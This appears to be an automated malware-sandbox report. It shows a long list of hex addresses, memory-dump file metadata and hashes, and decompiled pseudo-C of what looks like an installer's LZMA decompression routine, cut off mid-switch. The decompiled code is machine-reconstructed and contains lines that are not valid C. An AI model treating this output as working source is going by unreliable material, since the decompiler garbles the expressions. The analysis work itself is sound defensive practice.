                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004061ae
                                                                0x004061b4
                                                                0x004061b7
                                                                0x004061c4
                                                                0x004061cc
                                                                0x00000000
                                                                0x00000000
                                                                0x00406183
                                                                0x00406183
                                                                0x00406187
                                                                0x004069d2
                                                                0x00000000
                                                                0x004069d2
                                                                0x00406193
                                                                0x0040619e
                                                                0x0040619e
                                                                0x0040619e
                                                                0x004061a1
                                                                0x004061a4
                                                                0x004061a7
                                                                0x004061ac
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406843
                                                                0x00406843
                                                                0x00406849
                                                                0x0040684f
                                                                0x00406855
                                                                0x0040686f
                                                                0x00406872
                                                                0x00406878
                                                                0x00406883
                                                                0x00406883
                                                                0x00406885
                                                                0x00406857
                                                                0x00406857
                                                                0x00406866
                                                                0x0040686a
                                                                0x0040686a
                                                                0x0040688f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406891
                                                                0x00406895
                                                                0x00406a44
                                                                0x00000000
                                                                0x00406a44
                                                                0x004068a1
                                                                0x004068a8
                                                                0x004068b0
                                                                0x004068b3
                                                                0x004068b6
                                                                0x004068b6
                                                                0x00000000
                                                                0x00000000
                                                                0x004061d4
                                                                0x004061d6
                                                                0x004061d9
                                                                0x0040624a
                                                                0x0040624d
                                                                0x00406250
                                                                0x00406257
                                                                0x00406261
                                                                0x00000000
                                                                0x00406261
                                                                0x004061db
                                                                0x004061df
                                                                0x004061e2
                                                                0x004061e4
                                                                0x004061e7
                                                                0x004061ea
                                                                0x004061ec
                                                                0x004061ef
                                                                0x004061f1
                                                                0x004061f6
                                                                0x004061f9
                                                                0x004061fc
                                                                0x00406200
                                                                0x00406207
                                                                0x0040620a
                                                                0x00406211
                                                                0x00406215
                                                                0x0040621d
                                                                0x0040621d
                                                                0x0040621d
                                                                0x00406217
                                                                0x00406217
                                                                0x00406217
                                                                0x0040620c
                                                                0x0040620c
                                                                0x0040620c
                                                                0x00406221
                                                                0x00406224
                                                                0x00406242
                                                                0x00406244
                                                                0x00000000
                                                                0x00406226
                                                                0x00406226
                                                                0x00406229
                                                                0x0040622c
                                                                0x0040622f
                                                                0x00406231
                                                                0x00406231
                                                                0x00406231
                                                                0x00406234
                                                                0x00406237
                                                                0x00406239
                                                                0x0040623a
                                                                0x0040623d
                                                                0x00000000
                                                                0x0040623d
                                                                0x00000000
                                                                0x00406473
                                                                0x00406477
                                                                0x00406495
                                                                0x00406498
                                                                0x0040649f
                                                                0x004064a2
                                                                0x004064a5
                                                                0x004064a8
                                                                0x004064ab
                                                                0x004064ae
                                                                0x004064b0
                                                                0x004064b7
                                                                0x004064b8
                                                                0x004064ba
                                                                0x004064bd
                                                                0x004064c0
                                                                0x004064c3
                                                                0x004064c3
                                                                0x004064c8
                                                                0x00000000
                                                                0x004064c8
                                                                0x00406479
                                                                0x0040647c
                                                                0x0040647f
                                                                0x00406489
                                                                0x00000000
                                                                0x00000000
                                                                0x004064dd
                                                                0x004064e1
                                                                0x00406504
                                                                0x00406507
                                                                0x0040650a
                                                                0x00406514
                                                                0x004064e3
                                                                0x004064e3
                                                                0x004064e6
                                                                0x004064e9
                                                                0x004064ec
                                                                0x004064f9
                                                                0x004064fc
                                                                0x004064fc
                                                                0x00000000
                                                                0x00000000
                                                                0x00406520
                                                                0x00406524
                                                                0x00000000
                                                                0x00000000
                                                                0x0040652a
                                                                0x0040652e
                                                                0x00000000
                                                                0x00000000
                                                                0x00406534
                                                                0x00406536
                                                                0x0040653a
                                                                0x0040653a
                                                                0x0040653d
                                                                0x00406541
                                                                0x00000000
                                                                0x00000000
                                                                0x00406591
                                                                0x00406595
                                                                0x0040659c
                                                                0x0040659f
                                                                0x004065a2
                                                                0x004065ac
                                                                0x00000000
                                                                0x004065ac
                                                                0x00406597
                                                                0x00000000
                                                                0x00000000
                                                                0x004065b8
                                                                0x004065bc
                                                                0x004065c3
                                                                0x004065c6
                                                                0x004065c9
                                                                0x004065be
                                                                0x004065be
                                                                0x004065be
                                                                0x004065cc
                                                                0x004065cf
                                                                0x004065d2
                                                                0x004065d2
                                                                0x004065d5
                                                                0x004065d8
                                                                0x004065db
                                                                0x004065db
                                                                0x004065de
                                                                0x004065e5
                                                                0x004065ea
                                                                0x00000000
                                                                0x00000000
                                                                0x00406678
                                                                0x00406678
                                                                0x0040667c
                                                                0x00406a1a
                                                                0x00000000
                                                                0x00406a1a
                                                                0x00406682
                                                                0x00406685
                                                                0x00406688
                                                                0x0040668c
                                                                0x0040668f
                                                                0x00406695
                                                                0x00406697
                                                                0x00406697
                                                                0x00406697
                                                                0x0040669a
                                                                0x0040669d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040626d
                                                                0x0040626d
                                                                0x00406271
                                                                0x004069de
                                                                0x00000000
                                                                0x004069de
                                                                0x00406277
                                                                0x0040627a
                                                                0x0040627d
                                                                0x00406281
                                                                0x00406284
                                                                0x0040628a
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628f
                                                                0x00406292
                                                                0x00406292
                                                                0x00406295
                                                                0x00406298
                                                                0x00000000
                                                                0x00000000
                                                                0x0040629e
                                                                0x004062a4
                                                                0x00000000
                                                                0x00000000
                                                                0x004062aa
                                                                0x004062aa
                                                                0x004062ae
                                                                0x004062b1
                                                                0x004062b4
                                                                0x004062b7
                                                                0x004062ba
                                                                0x004062bb
                                                                0x004062be
                                                                0x004062c0
                                                                0x004062c6
                                                                0x004062c9
                                                                0x004062cc
                                                                0x004062cf
                                                                0x004062d2
                                                                0x004062d5
                                                                0x004062d8
                                                                0x004062f4
                                                                0x004062f7
                                                                0x004062fa
                                                                0x004062fd
                                                                0x00406304
                                                                0x00406308
                                                                0x0040630a
                                                                0x0040630e
                                                                0x004062da
                                                                0x004062da
                                                                0x004062de
                                                                0x004062e6
                                                                0x004062eb
                                                                0x004062ed
                                                                0x004062ef
                                                                0x004062ef
                                                                0x00406311
                                                                0x00406318
                                                                0x0040631b
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406326
                                                                0x00406326
                                                                0x0040632a
                                                                0x004069ea
                                                                0x00000000
                                                                0x004069ea
                                                                0x00406330
                                                                0x00406333
                                                                0x00406336
                                                                0x0040633a
                                                                0x0040633d
                                                                0x00406343
                                                                0x00406345
                                                                0x00406345
                                                                0x00406345
                                                                0x00406348
                                                                0x0040634b
                                                                0x0040634b
                                                                0x0040634b
                                                                0x00406351
                                                                0x00000000
                                                                0x00000000
                                                                0x00406353
                                                                0x00406356
                                                                0x00406359
                                                                0x0040635c
                                                                0x0040635f
                                                                0x00406362
                                                                0x00406365
                                                                0x00406368
                                                                0x0040636b
                                                                0x0040636e
                                                                0x00406371
                                                                0x00406389
                                                                0x0040638c
                                                                0x0040638f
                                                                0x00406392
                                                                0x00406392
                                                                0x00406395
                                                                0x00406399
                                                                0x0040639b
                                                                0x00406373
                                                                0x00406373
                                                                0x0040637b
                                                                0x00406380
                                                                0x00406382
                                                                0x00406384
                                                                0x00406384
                                                                0x0040639e
                                                                0x004063a5
                                                                0x004063a8
                                                                0x00000000
                                                                0x004063aa
                                                                0x00000000
                                                                0x004063aa
                                                                0x004063a8
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x00000000
                                                                0x00000000
                                                                0x004063ea
                                                                0x004063ea
                                                                0x004063ee
                                                                0x004069f6
                                                                0x00000000
                                                                0x004069f6
                                                                0x004063f4
                                                                0x004063f7
                                                                0x004063fa
                                                                0x004063fe
                                                                0x00406401
                                                                0x00406407
                                                                0x00406409
                                                                0x00406409
                                                                0x00406409
                                                                0x0040640c
                                                                0x0040640f
                                                                0x0040640f
                                                                0x00406415
                                                                0x004063b3
                                                                0x004063b3
                                                                0x004063b6
                                                                0x00000000
                                                                0x004063b6
                                                                0x00406417
                                                                0x00406417
                                                                0x0040641a
                                                                0x0040641d
                                                                0x00406420
                                                                0x00406423
                                                                0x00406426
                                                                0x00406429
                                                                0x0040642c
                                                                0x0040642f
                                                                0x00406432
                                                                0x00406435
                                                                0x0040644d
                                                                0x00406450
                                                                0x00406453
                                                                0x00406456
                                                                0x00406456
                                                                0x00406459
                                                                0x0040645d
                                                                0x0040645f
                                                                0x00406437
                                                                0x00406437
                                                                0x0040643f
                                                                0x00406444
                                                                0x00406446
                                                                0x00406448
                                                                0x00406448
                                                                0x00406462
                                                                0x00406469
                                                                0x0040646c
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x004066fb
                                                                0x004066fb
                                                                0x004066ff
                                                                0x00406a26
                                                                0x00000000
                                                                0x00406a26
                                                                0x00406705
                                                                0x00406708
                                                                0x0040670b
                                                                0x0040670f
                                                                0x00406712
                                                                0x00406718
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671d
                                                                0x00000000
                                                                0x00000000
                                                                0x004064cb
                                                                0x004064cb
                                                                0x004064ce
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004068c7
                                                                0x004068cb
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068f0
                                                                0x004068f7
                                                                0x00000000
                                                                0x004068f7
                                                                0x004068cd
                                                                0x004068d0
                                                                0x004068d3
                                                                0x004068d6
                                                                0x004068dd
                                                                0x00000000
                                                                0x00000000
                                                                0x004069b8
                                                                0x004069bb
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00000000
                                                                0x00000000
                                                                0x004065f2
                                                                0x004065f4
                                                                0x004065fb
                                                                0x004065fc
                                                                0x004065fe
                                                                0x00406601
                                                                0x00000000
                                                                0x00000000
                                                                0x00406609
                                                                0x0040660c
                                                                0x0040660f
                                                                0x00406611
                                                                0x00406613
                                                                0x00406613
                                                                0x00406614
                                                                0x00406617
                                                                0x0040661e
                                                                0x00406621
                                                                0x0040662f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406914
                                                                0x00406914
                                                                0x00406918
                                                                0x00406a50
                                                                0x00000000
                                                                0x00406a50
                                                                0x0040691e
                                                                0x00406921
                                                                0x00406924
                                                                0x00406928
                                                                0x0040692b
                                                                0x00406931
                                                                0x00406933
                                                                0x00406933
                                                                0x00406933
                                                                0x00406936
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x00000000
                                                                0x00000000
                                                                0x00406637
                                                                0x0040663a
                                                                0x00406670
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a3
                                                                0x004067a3
                                                                0x004067a6
                                                                0x004067a8
                                                                0x00406a32
                                                                0x00000000
                                                                0x00406a32
                                                                0x004067ae
                                                                0x004067b1
                                                                0x00000000
                                                                0x00000000
                                                                0x004067b7
                                                                0x004067bb
                                                                0x004067be
                                                                0x004067be
                                                                0x004067be
                                                                0x00000000
                                                                0x004067be
                                                                0x0040663c
                                                                0x0040663e
                                                                0x00406640
                                                                0x00406642
                                                                0x00406645
                                                                0x00406646
                                                                0x00406648
                                                                0x0040664a
                                                                0x0040664d
                                                                0x00406650
                                                                0x00406666
                                                                0x0040666b
                                                                0x004066a3
                                                                0x004066a3
                                                                0x004066a7
                                                                0x004066d3
                                                                0x004066d5
                                                                0x004066dc
                                                                0x004066df
                                                                0x004066e2
                                                                0x004066e2
                                                                0x004066e7
                                                                0x004066e7
                                                                0x004066e9
                                                                0x004066ec
                                                                0x004066f3
                                                                0x004066f6
                                                                0x00406723
                                                                0x00406723
                                                                0x00406726
                                                                0x00406729
                                                                0x0040679d
                                                                0x0040679d
                                                                0x0040679d
                                                                0x00000000
                                                                0x0040679d
                                                                0x0040672b
                                                                0x00406731
                                                                0x00406734
                                                                0x00406737
                                                                0x0040673a
                                                                0x0040673d
                                                                0x00406740
                                                                0x00406743
                                                                0x00406746
                                                                0x00406749
                                                                0x0040674c
                                                                0x00406765
                                                                0x00406767
                                                                0x0040676a
                                                                0x0040676b
                                                                0x0040676e
                                                                0x00406770
                                                                0x00406773
                                                                0x00406775
                                                                0x00406777
                                                                0x0040677a
                                                                0x0040677c
                                                                0x0040677f
                                                                0x00406783
                                                                0x00406785
                                                                0x00406785
                                                                0x00406786
                                                                0x00406789
                                                                0x0040678c
                                                                0x0040674e
                                                                0x0040674e
                                                                0x00406756
                                                                0x0040675b
                                                                0x0040675d
                                                                0x00406760
                                                                0x00406760
                                                                0x0040678f
                                                                0x00406796
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00000000
                                                                0x00406798
                                                                0x00000000
                                                                0x00406798
                                                                0x00406796
                                                                0x004066a9
                                                                0x004066ac
                                                                0x004066ae
                                                                0x004066b1
                                                                0x004066b4
                                                                0x004066b7
                                                                0x004066b9
                                                                0x004066bc
                                                                0x004066bf
                                                                0x004066bf
                                                                0x004066c2
                                                                0x004066c2
                                                                0x004066c5
                                                                0x004066cc
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x00000000
                                                                0x004066ce
                                                                0x00000000
                                                                0x004066ce
                                                                0x004066cc
                                                                0x00406652
                                                                0x00406655
                                                                0x00406657
                                                                0x0040665a
                                                                0x00000000
                                                                0x00000000
                                                                0x004063b9
                                                                0x004063b9
                                                                0x004063bd
                                                                0x00406a02
                                                                0x00000000
                                                                0x00406a02
                                                                0x004063c3
                                                                0x004063c6
                                                                0x004063c9
                                                                0x004063cc
                                                                0x004063cf
                                                                0x004063d2
                                                                0x004063d5
                                                                0x004063d7
                                                                0x004063da
                                                                0x004063dd
                                                                0x004063e0
                                                                0x004063e2
                                                                0x004063e2
                                                                0x004063e2
                                                                0x00000000
                                                                0x00000000
                                                                0x00406544
                                                                0x00406544
                                                                0x00406548
                                                                0x00406a0e
                                                                0x00000000
                                                                0x00406a0e
                                                                0x0040654e
                                                                0x00406551
                                                                0x00406554
                                                                0x00406557
                                                                0x00406559
                                                                0x00406559
                                                                0x00406559
                                                                0x0040655c
                                                                0x0040655f
                                                                0x00406562
                                                                0x00406565
                                                                0x00406568
                                                                0x0040656b
                                                                0x0040656c
                                                                0x0040656e
                                                                0x0040656e
                                                                0x0040656e
                                                                0x00406571
                                                                0x00406574
                                                                0x00406577
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657d
                                                                0x0040657f
                                                                0x0040657f
                                                                0x00000000
                                                                0x00000000
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c5
                                                                0x00000000
                                                                0x00000000
                                                                0x004067cb
                                                                0x004067ce
                                                                0x004067d1
                                                                0x004067d4
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d9
                                                                0x004067dc
                                                                0x004067df
                                                                0x004067e2
                                                                0x004067e5
                                                                0x004067e8
                                                                0x004067e9
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067ee
                                                                0x004067f1
                                                                0x004067f4
                                                                0x004067f7
                                                                0x004067fa
                                                                0x004067fe
                                                                0x00406800
                                                                0x00406803
                                                                0x00000000
                                                                0x00406805
                                                                0x00406582
                                                                0x00406582
                                                                0x00000000
                                                                0x00406582
                                                                0x00406803
                                                                0x00406a38
                                                                0x00406a5a
                                                                0x00406a60
                                                                0x00406a62
                                                                0x00406a69
                                                                0x00406a6b
                                                                0x00406a72
                                                                0x00406a76
                                                                0x00000000
                                                                0x00406067
                                                                0x00406a6f
                                                                0x00406a6f
                                                                0x00000000
                                                                0x00406a6f
                                                                0x004068bc
                                                                0x00406942
                                                                0x00406948
                                                                0x0040694b
                                                                0x0040694e
                                                                0x00406951
                                                                0x00406954
                                                                0x00406957
                                                                0x0040695a
                                                                0x0040695d
                                                                0x00406963
                                                                0x0040697c
                                                                0x0040697f
                                                                0x00406982
                                                                0x00406985
                                                                0x00406989
                                                                0x0040698b
                                                                0x0040698c
                                                                0x0040698f
                                                                0x00406965
                                                                0x00406965
                                                                0x0040696d
                                                                0x00406972
                                                                0x00406974
                                                                0x00406977
                                                                0x00406977
                                                                0x00406999
                                                                0x00000000
                                                                0x0040699b
                                                                0x00000000
                                                                0x0040699b
                                                                0x00406999
                                                                0x00000000
                                                                0x0040680e

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                                • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                                                • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                                • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00406520, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E00406520() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
